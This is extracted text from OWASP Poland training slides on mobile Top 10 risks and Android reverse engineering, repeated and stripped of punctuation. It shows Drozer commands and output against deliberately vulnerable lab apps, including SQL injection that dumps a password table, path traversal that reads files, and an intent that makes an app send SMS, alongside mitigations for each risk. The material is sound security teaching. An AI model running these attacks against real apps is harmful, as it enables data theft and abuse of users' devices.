bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
